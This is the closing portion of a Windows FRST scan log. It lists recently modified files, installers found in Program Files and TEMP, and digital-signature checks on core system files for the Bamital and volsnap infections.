C:\ProgramData\ntuser.pol 2017-04-21 13:18 - 2016-03-09 16:25 - 00000744 _____ C:\WINDOWS\system32\config\netlogon.ftl 2017-04-21 12:37 - 2016-03-11 13:27 - 00141288 _____ C:\Users\fundowic\AppData\Local\GDIPFONTCACHEV1.DAT 2017-04-19 21:10 - 2016-03-11 10:02 - 00000000 ____D C:\Users\fundowic\AppData\Local\Adobe 2017-04-19 20:38 - 2009-07-14 06:45 - 00495144 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-04-18 14:45 - 2016-03-09 16:40 - 00000000 ____D C:\ProgramData\Adobe 2017-04-18 14:45 - 2016-03-09 16:40 - 00000000 ____D C:\Program Files (x86)\Adobe 2017-04-18 14:20 - 2015-03-04 11:36 - 00000000 ____D C:\WINDOWS\ccmcache 2017-04-18 13:35 - 2016-03-09 17:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pulse Secure 2017-04-17 15:55 - 2016-06-11 20:39 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\vlc 2017-04-16 10:31 - 2016-03-26 19:47 - 00004476 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task ==================== Files in the root of some directories ======= 2016-03-14 09:25 - 2013-10-11 12:47 - 12566528 _____ () C:\Program Files\pgadmin3.msi 2016-03-14 08:53 - 2010-02-18 12:58 - 1165712 _____ () C:\Program Files\SQLTools_15b10D.exe 2016-03-11 10:18 - 2016-03-11 10:18 - 0007611 _____ () C:\Users\fundowic\AppData\Local\Resmon.ResmonCfg Some files in TEMP: ==================== 2016-03-11 11:10 - 2016-03-11 11:10 - 2033976 _____ () C:\Users\fundowic\AppData\Local\Temp\dsHostCheckerSetup.exe 2015-08-05 16:41 - 2015-08-05 16:41 - 0185968 _____ (Pulse Secure, LLC) C:\Users\fundowic\AppData\Local\Temp\dsNCInst64.exe 2016-10-24 02:55 - 2016-10-24 02:55 - 0737856 _____ (Oracle Corporation) C:\Users\fundowic\AppData\Local\Temp\jre-8u111-windows-au.exe 2016-05-28 01:56 - 2016-05-28 01:56 - 0739904 _____ (Oracle Corporation) C:\Users\fundowic\AppData\Local\Temp\jre-8u91-windows-au.exe 2016-03-11 11:12 - 2016-03-11 11:12 - 2458248 _____ () C:\Users\fundowic\AppData\Local\Temp\neoNCSetup64.exe 2016-05-12 08:39 - 2016-05-12 08:39 - 4203840 _____ () C:\Users\fundowic\AppData\Local\Temp\npp.6.9.1.Installer.exe 2016-03-11 10:01 - 2007-06-11 13:39 - 0118784 _____ (TELEATLAS) C:\Users\fundowic\AppData\Local\Temp\TAWiMAS.exe 2015-08-03 01:58 - 2015-08-03 01:58 - 0118784 _____ () C:\Users\fundowic\AppData\Local\Temp\xmlUpdater.exe ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-05-03 00:15 ==================== End of FRST.txt ============================